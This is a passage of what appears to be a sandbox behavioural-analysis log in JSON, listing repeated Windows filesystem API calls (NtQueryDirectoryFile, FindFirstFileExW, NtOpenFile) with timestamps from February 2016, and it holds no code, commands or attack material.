"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "NtOpenFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:38,808", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,808", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,838", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,928", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,928", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,928", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,928", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,928", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,928", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:39,018", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,058", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,058", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,058", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,058", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,058", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,058", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtOpenFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
